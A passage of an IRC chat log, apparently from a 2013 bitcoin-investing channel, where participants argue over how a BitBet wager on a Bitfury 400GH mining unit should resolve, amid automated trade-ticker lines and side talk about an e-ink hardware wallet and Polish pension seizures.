coffee instead? Sep 07 20:22:19 suppose the cup is half full. Sep 07 20:22:27 has the absolute been satisfied ? Sep 07 20:22:27 suppose it's a cup of piss Sep 07 20:22:45 yes, as you didn't state how full the cup should be Sep 07 20:22:56 well but it's an absolute! Sep 07 20:23:18 yes, so any cup of coffee, no matter how vague, will do Sep 07 20:23:29 nubbins`: the bet didn't state how many boards the unit must be Sep 07 20:23:36 Luke-Jr: yes it did Sep 07 20:23:43 "you must bring a single cup of coffee containing 400ml" would be a better analogy Sep 07 20:23:43 nubbins` that's the problem with absolutes. Sep 07 20:23:47 however, if you request 500ml of coffee at 90C, and I bring 437ml of coffee at 45C... Sep 07 20:24:01 then i've obviously not delivered on your absolute Sep 07 20:24:08 deizel wasn't making an analogy for the bet, was simply verifying the properties of must. Sep 07 20:24:10 [BTCTC] [DMS.MINING] 3 @ 0.00247 = 0.0074 BTC [-] Sep 07 20:24:13 [BTCTC] [ASICMINER-PT] 1 @ 2.188 BTC [-] Sep 07 20:24:18 nubbins`: in this case, they brought 500ml of coffee at 90C in a bigger cup Sep 07 20:24:21 Luke-Jr: It says the 400Gh unit must meet advertised performance.... it was advertised at 1-Mboard, 1-Rpi with 16 H-cards....... you're totally wrong and out of your league here... please READ Sep 07 20:24:29 [BTCTC] [ASICMINER-PT] 1 @ 2.188 BTC [-] Sep 07 20:24:31 it's still absolute Sep 07 20:24:45 No, in this case, they brought 2 cups of coffe, because they didn't make 1 cup big enough Sep 07 20:24:51 I wanted 400ml in 1 cup Sep 07 20:24:55 it is still absolute, but that doesn't mean absolutely anything someone wants it to mean. Sep 07 20:24:56 fine, 500ml of 90C coffee in 2 cups Sep 07 20:24:56 I got 400ml in 2 cups.... Sep 07 20:24:56 [BTCTC] [DMS.MINING] 3 @ 0.002407 = 0.0072 BTC [-] Sep 07 20:24:57 [BTCTC] [DMS.MINING] 497 @ 0.002407 = 1.1963 BTC [-] Sep 07 20:25:00 the bet is a no Sep 07 20:25:02 this guy MXRider even says: "Some info and pictures of my units: 400GH unit and 25GH unit." Sep 07 20:25:11 I want my coffee in 1 CUP Sep 07 20:25:13 obviously 2 separate units Sep 07 20:25:13 [BTCTC] [ASICMINER-PT] 1 @ 2.172 BTC [-] Sep 07 20:25:14 you either absolutely brought a cup of coffee or a cup of containing 400ml of coffee.. its all depends on the wording of the initial demand Sep 07 20:25:19 nubbins`: only the judge of the bet has any authority to interpret the bet in this case Sep 07 20:25:39 [HAVELOCK] [AM100] 1 @ 0.01902 BTC [-] Sep 07 20:25:42 Luke-Jr: all have authority to interpret. few have authority to pass judgment Sep 07 20:25:43 [HAVELOCK] [AM100] 11 @ 0.01901002 = 0.2091 BTC [-] Sep 07 20:25:43 Bunnyh: yes.... of course its 2 seperate units... Luke-Jr doesn't understand what a unit is.... Sep 07 20:25:51 Luke-Jr decided not to read anything and jumped to conclusions Sep 07 20:26:04 fractal need you a link to the earlier discussion of laptops ? Sep 07 20:26:41 mp: you asked for 1 cup with 400ML coffee in it.... you got 2 cups with 250ML in each one..... the request was not met. Sep 07 20:26:51 you only want to carry around 1 cup, not 2 cups Sep 07 20:26:55 well i asked for nothing, myself. Sep 07 20:27:01 so, "Coffee must meet advertised capacity (400ml per cup)" and I give you two cups, each with less than 400ml... Sep 07 20:27:04 mp: thats the perfect anaology Sep 07 20:27:08 im just sitting here and partaking in the lively debate of shit that actually matters. Sep 07 20:27:16 this is the aborted rota part 2, basically. Sep 07 20:27:30 see, if the manufacturer had taped both units inside a shoebox, he could get away with calling two separate units a single unit. but he didn't. the guy who received the units said "here are my two units", and then just pretended that the two separate units were in fact collectively the smaller unit Sep 07 20:27:39 deizel: yes... correct.... mp, luke-jr, and other bitbet shills were paid off by Anduck and the yes betters... .which is why they'll disagree with you and the facts Sep 07 20:27:47 [BTCTC] [ASICMINER-PT] 1 @ 2.189 BTC [+] Sep 07 20:27:55 nubbins` im sure at some point they were somehow packaged together. seems a weird way to go about it. Sep 07 20:27:58 I didn't even know who the yes betters were until just now Sep 07 20:28:07 and lol @ me being a bitbet shill Sep 07 20:28:12 [BTCTC] [BTC-GROWTH] 4 @ 0.0999 = 0.3996 BTC [+] Sep 07 20:28:15 nubbins`: thats exactly correct. your ability to draw logic is very good Sep 07 20:28:17 fractal dude get away. it's ridiculous, anduck is this kid. Sep 07 20:28:32 mircea_popescu: well, what do you suppose was on the shipping waybill? one item or two? Sep 07 20:28:42 fractal: math degree Sep 07 20:28:46 nubbins` i have no idea, but i think it's a ridiculous criteria. Sep 07 20:28:48 "the guy who received the units said "here are my two units", and then just pretended that the two separate units were in fact collectively the smaller unit" <--- this Sep 07 20:28:58 mircea_popescu: the whole thing is ridiculous Sep 07 20:28:59 [HAVELOCK] [LABCO] 10 @ 0.0033 = 0.033 BTC [+] Sep 07 20:29:09 i wonder if the rabinical council of lvov ever saw such heartfelt contention ! Sep 07 20:29:15 mp: maybe if the bet was a NO , as it should have been, then there wouldn't be any issues Sep 07 20:29:20 <3 Sep 07 20:29:31 fractal there'd have been a number of issues still, yes. Sep 07 20:29:54 [BTCTC] [ASICMINER-PT] 1 @ 2.237 BTC [+] Sep 07 20:29:54 mp: why? nobody on the yes side would have complained, because not all clauses were met.... Sep 07 20:29:55 [BTCTC] [ASICMINER-PT] 1 @ 2.238 BTC [+] Sep 07 20:30:10 number of boards was not a clause Sep 07 20:30:27 I'm gonna introduce a bet that Apple makes a dual-screen laptop in 2013, and then i'm going to order a macbook and an iPhone, and claim that when they both show up, it's a dual-screen laptop Sep 07 20:30:36 because hey Sep 07 20:30:44 who cares that they were sold as discrete units Sep 07 20:30:44 fractal: ok, though i don't remember saying anything here :P Sep 07 20:30:46 i own both Sep 07 20:30:56 well, maybe yesterday. this conversation looks familiar ! Sep 07 20:31:02 and therefore can call the macbook+phone combo "a macbook" Sep 07 20:31:27 lol. nubbins` would you return a laptop because it comes with a power brick and you ordered ONE unit ? Sep 07 20:31:27 i mean, the bet says the macbook must have 2 screens, and see? two screens Sep 07 20:31:38 nubbins`: but these WEREN'T sold as discrete units Sep 07 20:32:09 mircea_popescu: i'm greedy, i don't return free things Sep 07 20:32:21 Luke-Jr: there seems to be a lot of confusion around that point Sep 07 20:32:21 ya well. Sep 07 20:32:22 nubbins`: nor is "unit" a trademark - it's an English word that can apply to collectives Sep 07 20:32:52 while Apple can define "macbook" because it is their trademark, English words are completely in the judge's discretion Sep 07 20:33:07 Luke-Jr: not in this case -- the language dicatates that a unit is self-contained miner, not a collection of miners, due to it being advertsied as such Sep 07 20:33:19 so, sorry. Sep 07 20:34:05 can i just get a clear answer on one thing: are people who ordered the "400 gigahash mining unit" receiving 400GH/s+ at 400W, regardless of the form it takes? Sep 07 20:34:15 nubbins` yeah they did. Sep 07 20:34:25 it was about 290w or something like that, Sep 07 20:34:25 any arguments to the contrary? Sep 07 20:34:41 and as far as anyone kniows they'll get refurbished later to double performance or some shit Sep 07 20:35:10 well, refurbs aren't relevant to this bet, although that'd be great news for the owners Sep 07 20:35:45 okay, so everyone seems to have gone silent, which i guess means that people who ordered "400 gigahash mining units" received 400GH/s+ at <= 400W Sep 07 20:35:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02049 BTC [+] Sep 07 20:35:57 so what's the big fucking problem? Sep 07 20:36:19 or are we just flapping our gums at each other Sep 07 20:36:24 it wasn't packed right, basically. Sep 07 20:36:30 lel Sep 07 20:36:31 which has some merits, but how far are you going to go. Sep 07 20:36:35 cry me a river Sep 07 20:36:48 eventually someone in samoa is going to say some miner is not according to obscure samoan law thus undelivered thus bet is a clear no. Sep 07 20:36:57 and i'm looking at you jcpham Sep 07 20:37:22 the bet specifically states that the form of the 400Gh must be in a single unit. It is not. they missed on performance. the bet is therefore a no. Sep 07 20:37:36 no it doesn't Sep 07 20:37:41 quote the part where it says that Sep 07 20:37:53 400Gh UNIT 400W Sep 07 20:37:57 unit == 1 miner Sep 07 20:38:00 as advertised Sep 07 20:38:20 sorry, no Sep 07 20:38:25 http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ this is what the 400Gh UNIT was advertsied as Sep 07 20:38:34 [HAVELOCK] [XBOND] 13 @ 0.00111707 = 0.0145 BTC [+] Sep 07 20:38:36 this unit, as advertised, did not meet performance specs Sep 07 20:38:38 [HAVELOCK] [XBOND] 25 @ 0.00111968 = 0.028 BTC [+] Sep 07 20:38:42 [HAVELOCK] [XBOND] 1462 @ 0.0011197 = 1.637 BTC [+] Sep 07 20:38:47 when you get a big mac combo, is it not a meal because it's not all smashed together? Sep 07 20:39:14 nubbins: if the bet says you must get 400ml of coffee in your cup, and you get 2 cups with 500ml, they bet is a no. Sep 07 20:39:22 [HAVELOCK] [XBOND] 18 @ 0.0011197 = 0.0202 BTC [+] Sep 07 20:39:25 [HAVELOCK] [XBOND] 88 @ 0.0011199 = 0.0986 BTC [+] Sep 07 20:39:29 [BTCTC] [BASIC-MINING] 1 @ 0.105 BTC [+] Sep 07 20:39:30 [HAVELOCK] [XBOND] 100 @ 0.00112 = 0.112 BTC [+] Sep 07 20:39:33 but the bet doesn't say "in your cup" Sep 07 20:39:33 [HAVELOCK] [XBOND] 10 @ 0.00112 = 0.0112 BTC [+] Sep 07 20:39:39 it just states an amount of coffee Sep 07 20:39:44 400ML in a cup @ 140degrees F Sep 07 20:39:49 400Gh UNIT Sep 07 20:39:49 ThickAsThieves if I buy one xbond will that allow me to buy as many pre-ipvo shares as I can get my hands on, or do I have to redeem 1 xbond per neobee? Sep 07 20:39:49 [HAVELOCK] [SMG] 3 @ 0.00021999 = 0.0007 BTC [+] Sep 07 20:39:53 [BTCTC] [TAT.ASICMINER] 104 @ 0.02049 = 2.131 BTC [+] Sep 07 20:39:54 the word unit is specifically written there Sep 07 20:39:55 yeah, you keep saying the word unit Sep 07 20:40:04 and a unit is advertised here http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ Sep 07 20:40:14 this unit, as advertised, doesn't do 400Gh Sep 07 20:40:27 the bet required the hardware to meet performance as advertised. it didn't Sep 07 20:40:27 i thought you had a valid beef, but you're just squabbling over semantics because you lost money Sep 07 20:40:34 grow up Sep 07 20:40:49 lel @ fractal sobbing over a free upgrade Sep 07 20:40:49 its not semantics, its actual logical language Sep 07 20:41:06 the joke isn't on me, its on everyone disagreeing Sep 07 20:41:30 the fact is that the language , as written, requires a 400Gh UNIT to exist Sep 07 20:41:36 as advertised Sep 07 20:42:29 i renovated my bathroom last month, and i purchased a new shower unit Sep 07 20:42:34 [BTCTC] [DMS.PURCHASE] 10 @ 0.01209 = 0.1209 BTC [-] Sep 07 20:42:34 (no joke) Sep 07 20:42:43 the unit consisted of a tub and a tub surround Sep 07 20:42:53 sometimes "units" have more than one item Sep 07 20:43:00 nubbins` how much is anduck paying you btw ? Sep 07 20:43:19 nubbins`: then that is the unit as advertised..... the unit as advertised here was 1M-board, 1R-pi, and 16 H-cards Sep 07 20:43:41 mircea_popescu: i can get paid to do this??!?! Sep 07 20:44:01 jesus Sep 07 20:44:03 i dare you to come in here every day and complain. <--- challenge accepted Sep 07 20:44:04 talk about a wasted life Sep 07 20:44:18 [HAVELOCK] [XBOND] 10 @ 0.00113 = 0.0113 BTC [+] Sep 07 20:44:41 nubbins`: https://bitcointalk.org/index.php?topic=240677.0 received zero valid offers, so my guess is no, you can't Sep 07 20:44:41 nubbins` i hear there's a ~5btc budget. Sep 07 20:45:26 pretty deep pockets for ~11BTC in losing bets Sep 07 20:45:42 it's in the scrollback. Sep 07 20:46:38 anyway, a "unit" is obviously whatever they're selling as "a unit" Sep 07 20:46:47 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.000581 = 0.0035 BTC [+] Sep 07 20:46:54 if they want to include a free baseball card, well, each unit comes with a baseball card Sep 07 20:46:57 [HAVELOCK] [XBOND] 50 @ 0.00113998 = 0.057 BTC [+] Sep 07 20:46:58 nubbins`: and this is what they're selling as a unit --> http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ Sep 07 20:47:01 [HAVELOCK] [XBOND] 10 @ 0.00114 = 0.0114 BTC [+] Sep 07 20:47:19 nubbins`: according to bitbet rules, the timestamp of the bet is what is advertsied -- it can't be changed after the fact. Sep 07 20:47:28 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.00058 = 0.0122 BTC [-] Sep 07 20:47:31 so adding more hardware doesn't apply Sep 07 20:48:07 you make a convincing argument, but the bet doesn't mention anything about the components included Sep 07 20:48:18 it only mentions performance, which was delivered upon Sep 07 20:48:34 whoever made the bet should have been more specific, i guess Sep 07 20:48:36 nubbins`: it wasn't though. the 400Gh unit , as advertised, only does 365Gh. Sep 07 20:48:44 that they shipped more hardware is irrelevant Sep 07 20:49:14 i placed the bet because i didn't think the hardware was going to perform as advertised -- and it didn't Sep 07 20:49:17 i got robbed Sep 07 20:49:30 [BTCTC] [ACTIVEMINING] 10 @ 0.003804 = 0.038 BTC [-] Sep 07 20:49:32 [BTCTC] [ACTIVEMINING] 258 @ 0.003803 = 0.9812 BTC [-] Sep 07 20:49:33 [BTCTC] [ACTIVEMINING] 338 @ 0.003801 = 1.2847 BTC [-] Sep 07 20:49:34 [BTCTC] [ACTIVEMINING] 94 @ 0.0038 = 0.3572 BTC [-] Sep 07 20:49:37 well, it's relevant in that they delivered on all specs that were in the bet Sep 07 20:49:50 no they didn't Sep 07 20:49:51 if indeed that's the case you'd have been much better served by making a "The Bitfury strikes back 400gh/s unit will not exist as the 16 boards together will hash under 400gh/s" Sep 07 20:49:55 the 400Gh unit wasn't 400Gh Sep 07 20:49:56 [BTCTC] [ACTIVEMINING] 377 @ 0.003804 = 1.4341 BTC [+] Sep 07 20:49:57 [BTCTC] [ACTIVEMINING] 258 @ 0.003803 = 0.9812 BTC [-] Sep 07 20:49:58 [BTCTC] [ACTIVEMINING] 1251 @ 0.0038 = 4.7538 BTC [-] Sep 07 20:50:00 you didn't get robbed, you misjudged their ability to deliver a certain GH/s for a certain W Sep 07 20:50:11 mp: i should have done that in hindsight , of course Sep 07 20:50:22 nubbins`: no, i was correct in that the 400Gh unit would not hash at 400Gh Sep 07 20:50:24 [BTCTC] [ACTIVEMINING] 13 @ 0.003787 = 0.0492 BTC [-] Sep 07 20:50:27 [BTCTC] [ACTIVEMINING] 52 @ 0.003786 = 0.1969 BTC [-] Sep 07 20:50:28 [BTCTC] [ACTIVEMINING] 27 @ 0.003781 = 0.1021 BTC [-] Sep 07 20:50:30 [BTCTC] [ACTIVEMINING] 22 @ 0.00378 = 0.0832 BTC [-] Sep 07 20:50:30 no, you weren't Sep 07 20:50:32 which was a performance requirement Sep 07 20:50:33 that's what i'm saying Sep 07 20:50:40 this is imo the most important takeaway here : rather than hang your bet on some technicality, just make a new one in which your point of interest is substantially the bet. Sep 07 20:50:40 i was. thats what im saying Sep 07 20:51:02 yeah Sep 07 20:51:05 the unit must be > 400Gh, and < 400W.. the unit did not meet this performance spec Sep 07 20:51:11 the bet is therefore a no Sep 07 20:51:12 really poorly worded bet was the root of all this trouble Sep 07 20:51:25 if you lost money because you bet on a poorly worded bet, well, nobody feels sorry for you Sep 07 20:51:27 nubbins` they're always and perpetually going to be poorly worded. Sep 07 20:51:29 yes, i would agree that the bullshit bet was poorly worded bullshit and i shouldn't have bet Sep 07 20:51:34 this because reality surprises, which is a good thing overall. Sep 07 20:51:41 mircea_popescu: and so forever, nobody will weep for those who lost Sep 07 20:51:43 if i knew that the decider was going to not follow logic Sep 07 20:51:46 i'm ok with this Sep 07 20:52:08 no, everyone is following logic Sep 07 20:52:14 you're just being fussy Sep 07 20:52:22 you'll never admit it, but you are Sep 07 20:52:39 theres no room for substantially delivered == delivered Sep 07 20:52:45 theres either true or false Sep 07 20:52:54 substantially delivered != delivered Sep 07 20:52:55 are you tall or s hort ? Sep 07 20:52:55 [BTCTC] [ASICMINER-PT] 1 @ 2.172 BTC [-] Sep 07 20:52:56 [BTCTC] [ASICMINER-PT] 2 @ 2.172 = 4.344 BTC [-] Sep 07 20:52:57 [BTCTC] [ASICMINER-PT] 1 @ 2.171 BTC [-] Sep 07 20:52:59 [BTCTC] [ASICMINER-PT] 1 @ 2.142 BTC [-] Sep 07 20:53:00 [BTCTC] [ASICMINER-PT] 2 @ 2.141 = 4.282 BTC [-] Sep 07 20:53:01 [BTCTC] [ASICMINER-PT] 1 @ 2.136 BTC [-] Sep 07 20:53:03 ok i gotta run Sep 07 20:53:06 i agree there, substantially != absolutely Sep 07 20:53:10 however Sep 07 20:53:15 [BTCTC] [ASICMINER-PT] 2 @ 2.136 = 4.272 BTC [-] Sep 07 20:53:18 the word "substantially" doesn't even belong there Sep 07 20:53:27 the bet was delivered upon, full stop Sep 07 20:53:32 no. it wasn't. Sep 07 20:53:33 any issues, get some tissues Sep 07 20:53:44 well the issue is fraud Sep 07 20:53:49 i thought you had to run Sep 07 20:54:00 so its not tissues, its an aweareness campaign for people to stay away from BitBet Sep 07 20:54:01 fraud! lel Sep 07 20:54:22 it's an awareness campaign to stay away from anything you're involved in Sep 07 20:54:36 [BTCTC] [DMS.MINING] 4 @ 0.002469 = 0.0099 BTC [+] Sep 07 20:54:43 "Will MT. GOX be trading Litecoin as a currency before the end of 2013? " why was this rejected? I don't how it is unverifiable Sep 07 20:54:43 only fools grab tissues Sep 07 20:54:50 [MPEX] [S.MPOE] 5200 @ 0.00088745 = 4.6147 BTC [-] Sep 07 20:54:50 people already stay away from bitbet Sep 07 20:54:53 [BTCTC] [MININGCO.ETF] 2 @ 0.1036 = 0.2072 BTC [-] Sep 07 20:54:54 pankkake: because you're an idiot Sep 07 20:55:04 nubbins`: obviously not enough of they stay away Sep 07 20:55:13 pankkake basically someone knows how it will come out Sep 07 20:55:17 you can't bet on shit lioke that. Sep 07 20:55:52 mp: pankkake isn't very smart, and wants to add more bad bets to bitbet, so that there are more problems like the one that just happened with bitfury.... Sep 07 20:56:14 name calling isn't nice Sep 07 20:56:16 so he can troll on the forums when the bet gets disputed Sep 07 20:56:25 nubbins`: tell that to Luke-Jr , who called me a theif. Sep 07 20:56:36 Luke-Jr: calling names isn't nice Sep 07 20:56:41 ... Sep 07 20:56:41 hahaha thanks Sep 07 20:56:50 always the voice of reason Sep 07 20:56:53 nubbins`: that's not a name, it's a noun Sep 07 20:56:53 mircea_popescu: what do you mean, someone at mtgox knows? does it matter? Sep 07 20:56:55 at least you're neutral Sep 07 20:57:08 Luke-Jr: it's not even a word Sep 07 20:57:19 nubbins`: the misspelling was fractal_'s Sep 07 20:57:19 pankkake well to me it reads like a variant of "I will publish the number 15 on my website by end of year". Sep 07 20:57:21 I before E except after C Sep 07 20:57:23 why's this even a bet ? Sep 07 20:57:28 and except after all those other instances Sep 07 20:57:38 Luke-Jr: i figured ;( Sep 07 20:58:14 well it's more than that, it's actually having the possibility to buy litecoins with it Sep 07 20:58:26 add something about volume to the wording Sep 07 20:58:33 nubbins`: Luke-Jr is quite the hypocrite, pull up logs from 2 months ago regarding him and namecoin, you'll see he became corrupted by money.... very sad from someone who preaches about morals all day. Sep 07 20:58:50 gox will have a daily volume of xyz in LTC by the end of 2013 Sep 07 20:59:07 Luke-Jr likes to pass judgement on others, but ignores his own sings Sep 07 20:59:08 pankkake: Try "Will someone successfully obtain fiat currency in a traditional bank transferred from MtGox, from selling Litecoins on MtGox, before 2014?" Sep 07 20:59:08 sins Sep 07 20:59:09 fractal_: i don't care and that's not relevant. who taught you how to argue? Sep 07 20:59:29 fractal_: as I already said, Namecoin changed Sep 07 20:59:32 i'm l33t. im a layw3r Sep 07 20:59:36 i don't give a red fuck if someone's "corrupted by money" or what their morals are Sep 07 20:59:43 Luke-Jr: the blockchain data didn't Sep 07 20:59:52 Luke-Jr: that's better, but then no one will bet on that :p Sep 07 21:00:06 fractal_: you're assuming we store it Sep 07 21:00:07 nubbins`: yes, but Luke-Jr cares, because he passes judgement on others and ignores his own sins.... Sep 07 21:00:32 fractal_: okay, lovely, but why do you tell me this? Sep 07 21:00:55 i'd suggest that Luke-Jr pray forgiveness for his sins before passing judgement on others Sep 07 21:01:00 pankkake i made the mistake of querying the mod that did it. here you go : "because wtf is mtgox already! look they've been announcing ltc for like a year. it's a dying dog saying it's going to start eating rabbits, i'm not taking bets on whether it actually does. besides, they're a known group of scammers and liars, what's to keep them from fronting ltc trades? and then obviously even if they did manage to implement t Sep 07 21:01:00 he thing, "you can only trade with an anal probe" well is it implemented or not?" Sep 07 21:01:34 gotta run... we'll have to continue the trollfest later.... Sep 07 21:01:42 no, don't go Sep 07 21:01:48 lol Sep 07 21:02:00 honestly, young adults these days Sep 07 21:02:21 mostly to put things in perspective. Sep 07 21:02:38 the amount of sheer psychotic paranoia on the part of bitbet mods is quite the thing to gaze upon Sep 07 21:02:46 and yet... Sep 07 21:05:11 nubbins`: yes, but Luke-Jr cares, because he passes judgement on others and ignores his own sins.... Sep 07 21:05:16 lel Sep 07 21:05:57 as if we're supposed to gasp and point Sep 07 21:06:11 smash a stone tablet or something Sep 07 21:06:28 [BTCTC] [DMS.MINING] 1 @ 0.002469 BTC [+] Sep 07 21:10:43 [HAVELOCK] [XBOND] 155 @ 0.00114 = 0.1767 BTC [+] Sep 07 21:12:09 man, deal coin is all over the place Sep 07 21:13:24 it's gotta suck to buy ipo shares and see them being traded at 0.6x par three days later Sep 07 21:14:26 nubbins` i think it's a good lesson really. Sep 07 21:14:35 it's one thing for all the pro conment to be startying "asic miners" Sep 07 21:14:45 it's another for every two bit kid with a modem to be doing the same. Sep 07 21:14:57 at least this way they learn they have to take losses in the process. Sep 07 21:15:46 well, i'm not sure how much learning takes place Sep 07 21:16:03 infinite idiots problem Sep 07 21:17:12 i've got some ideas about an e-ink based hardware wallet that i haven't fully thought through, maybe i could collect 600 BTC in an ipo as well Sep 07 21:17:23 spend 20 minutes making a website Sep 07 21:17:29 geocities is gone, right? Sep 07 21:18:06 [BTCTC] [DMS.MINING] 1 @ 0.002469 BTC [+] Sep 07 21:18:53 [MPEX] [S.MPOE] 3000 @ 0.00088589 = 2.6577 BTC [-] Sep 07 21:19:30 https://bitcointalk.org/index.php?topic=289508.0 Sep 07 21:19:35 [BTCTC] [TAT.MINIGAME] 3 @ 0.000243 = 0.0007 BTC [+] Sep 07 21:19:36 Using the Kobo Mini eReader as a dynamic (BIP0032) Bitcoin tip jar Sep 07 21:20:01 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.000645 = 0.0019 BTC [+] Sep 07 21:20:08 yeah, just saw that, coincidentally Sep 07 21:20:15 but those e-ink displays are cheap Sep 07 21:20:30 CHEAP Sep 07 21:21:06 nubbins`: https://neocities.org/ Sep 07 21:21:07 and you could make hardware wallets WAY less complicated than the trezor Sep 07 21:21:18 no need for usb cables or any of that risky shit Sep 07 21:22:22 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.000561 = 0.0067 BTC [-] Sep 07 21:23:15 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00056 = 0.0056 BTC [-] Sep 07 21:23:55 [BTCTC] [TAT.VIRTUALMINE] 80 @ 0.000551 = 0.0441 BTC [-] Sep 07 21:24:54 nubbins` i can see collecting a few hundred btc for making a hardware wallet if you can convince you know wtf you're doing. Sep 07 21:26:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000516 BTC [-] Sep 07 21:26:16 oh, i've got it all figured out, and it's brilliantly simple. i just don't have any contacts with the hardware know-how. Sep 07 21:26:44 it's so simple that i'm surprised it hasn't been done already Sep 07 21:26:58 and instead people are fucking with usb cables Sep 07 21:27:11 [BTCTC] [DMS.SELLING] 101 @ 0.009884 = 0.9983 BTC [+] Sep 07 21:28:51 [BTCTC] [DMS.MINING] 101 @ 0.00241 = 0.2434 BTC [-] Sep 07 21:28:58 problem is, you try to IPO the idea, and someone with hardware know-how just implements the idea before you get everything in place Sep 07 21:30:05 [BTCTC] [DMS.PURCHASE] 101 @ 0.01209 = 1.2211 BTC [-] Sep 07 21:30:31 perhaps. Sep 07 21:30:46 so find someone with the hardware know how to help you and ipo after. Sep 07 21:31:55 yeah, you'd have a hard time convincing someone with the know-how to get on board without already being stacked with cash Sep 07 21:32:36 this is where your own personal credentials get to play. Sep 07 21:32:52 well, easy for you to say Sep 07 21:32:56 ikr? Sep 07 21:33:01 lel Sep 07 21:33:05 but someone earlier was like they don't care about respek Sep 07 21:33:15 well... it matters, at the very least because it resolves this catch 22 situation. Sep 07 21:33:21 anyway, it could just as easily be implemented in a static web page with a couple lines of javascript Sep 07 21:33:39 it's just that having a hardware version would be cute Sep 07 21:33:46 and we know how people feel about cute things Sep 07 21:33:59 talk to a chinese vibrator manufacturer then Sep 07 21:34:01 besides, you can't fit a smartphone on your keychain Sep 07 21:34:48 cheapie e-ink displays, on the other hand Sep 07 21:35:11 supermarkets are already using them for live-updated price tags on shelves Sep 07 21:35:36 the beauty is that they don't even need any sort of net connectivity Sep 07 21:36:40 no physical connectivity at all, aside from your own PC at home Sep 07 21:37:27 mircea_popescu: browser as universal runtime Sep 07 21:37:33 mircea_popescu: COME ON Sep 07 21:37:37 no. Sep 07 21:37:58 [HAVELOCK] [AM100] 10 @ 0.02025 = 0.2025 BTC [+] Sep 07 21:38:31 5 dollar roll-to-roll printed smart phones are coming (eventually) Sep 07 21:38:56 javascript and html can be super light if done correctly Sep 07 21:39:00 [HAVELOCK] [AM100] 10 @ 0.02025 = 0.2025 BTC [+] Sep 07 21:39:17 even a web browser is pretty heavy for this sort of thing Sep 07 21:39:32 all you really need is the ability to display images and do some math Sep 07 21:40:29 nubbins` he was referencing some earlier discussion Sep 07 21:40:34 [HAVELOCK] [XBOND] 13 @ 0.001145 = 0.0149 BTC [+] Sep 07 21:40:38 you mean it's not all about me? ;p Sep 07 21:43:08 lol Sep 07 21:45:35 [BTCTC] [BASIC-MINING] 6 @ 0.1094 = 0.6564 BTC [+] Sep 07 21:45:40 [BTCTC] [BASIC-MINING] 31 @ 0.1095 = 3.3945 BTC [+] Sep 07 21:45:43 [BTCTC] [BASIC-MINING] 10 @ 0.11 = 1.1 BTC [+] Sep 07 21:45:50 [BTCTC] [BASIC-MINING] 2 @ 0.1122 = 0.2244 BTC [+] Sep 07 21:45:53 [BTCTC] [BASIC-MINING] 2 @ 0.1188 = 0.2376 BTC [+] Sep 07 21:49:34 [BTCTC] [ASICMINER-PT] 1 @ 2.197 BTC [+] Sep 07 21:50:56 http://www.zerohedge.com/contributed/2013-09-07/exactly-i-warned-cyprusization-goes-mainstream-ireland-tap-next-citizen-fund- Sep 07 21:52:54 spain or italy next ? Sep 07 21:55:36 [BTCTC] [ACTIVEMINING] 20 @ 0.003962 = 0.0792 BTC [+] Sep 07 21:55:37 [BTCTC] [ACTIVEMINING] 10 @ 0.003963 = 0.0396 BTC [+] Sep 07 21:55:38 [BTCTC] [ACTIVEMINING] 10 @ 0.003965 = 0.0397 BTC [+] Sep 07 21:55:40 [BTCTC] [ACTIVEMINING] 372 @ 0.003974 = 1.4783 BTC [+] Sep 07 21:55:40 [BTCTC] [ACTIVEMINING] 372 @ 0.003976 = 1.4791 BTC [+] Sep 07 21:55:41 [BTCTC] [ACTIVEMINING] 363 @ 0.003989 = 1.448 BTC [+] Sep 07 21:55:42 [BTCTC] [ACTIVEMINING] 250 @ 0.00399 = 0.9975 BTC [+] Sep 07 21:56:22 [BTCTC] [ACTIVEMINING] 324 @ 0.003996 = 1.2947 BTC [+] Sep 07 21:57:15 [BTCTC] [ACTIVEMINING] 283 @ 0.003996 = 1.1309 BTC [+] Sep 07 21:57:16 [BTCTC] [ACTIVEMINING] 141 @ 0.003999 = 0.5639 BTC [+] Sep 07 22:01:32 If they can get away with it somewhere, they'll start doing it elsewhere. Sep 07 22:01:53 and keep doing it more and more until they can no longer get away with it Sep 07 22:02:35 http://www.bloomberg.com/news/2013-09-04/poland-to-take-over-bonds-from-pension-funds-in-system-revamp.html Sep 07 22:02:48 there's a good example. the polish government just stole ~100bn dollars worth of private pensions Sep 07 22:03:07 because people having their own private pensions makes it pretty impossible for the state flytrap to borrow as nobody credits them Sep 07 22:03:28 By my estimates, that should occur somewhere between people left with 5% of their wealth and people being officially enslaved. Sep 07 22:03:47 Like they need to borrow more. If they can't function without constantly borrowing more... Sep 07 22:03:54 the best part ? "While the funds won’t be allowed to buy government bonds, they’ll be able to buy more corporate debt and will be freed from having to comply with performance benchmarks, according to comments from the labor and finance ministers." Sep 07 22:04:02 so basically... now that it's state run it may be bankrupt. Sep 07 22:04:25 puts any sort of statal proceeding against the free world on the very uneasy footing of "we know you're thieves" Sep 07 22:04:36 !seen ThickAsThieves Sep 07 22:05:07 ; seen ThickAsThieves Sep 07 22:05:35 ;; Sep 07 22:05:40 ta Sep 07 22:05:45 ;; Sep 07 22:05:49 ;; ThickAsThieves Sep 07 22:05:49 Error: "ThickAsThieves" is not a valid command. Sep 07 22:05:55 ;; seen ThickAsThieves Sep 07 22:05:56 ThickAsThieves was last seen in #bitcoin-assets 2 hours, 11 minutes, and 42 seconds ago: all companies are a scam, cuz like 99% of them go out of business someday Sep 07 22:05:57 hehe Sep 07 22:06:50 Any thoughts on the Neo & Bee IPO? Sep 07 22:08:44 [BTCTC] [LABCOIN] 5 @ 0.003403 = 0.017 BTC [+] Sep 07 22:08:45 [BTCTC] [LABCOIN] 145 @ 0.003402 = 0.4933 BTC [-] Sep 07 22:09:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.02099 BTC [+] Sep 07 22:09:40 [BTCTC] [ASICMINER-PT] 1 @ 2.237 BTC [+] Sep 07 22:10:20 [BTCTC] [ASICMINER-PT] 1 @ 2.237 BTC [+] Sep 07 22:10:21 [BTCTC] [ASICMINER-PT] 1 @ 2.238 BTC [+] Sep 07 22:10:40 [BTCTC] [ASICMINER-PT] 1 @ 2.238 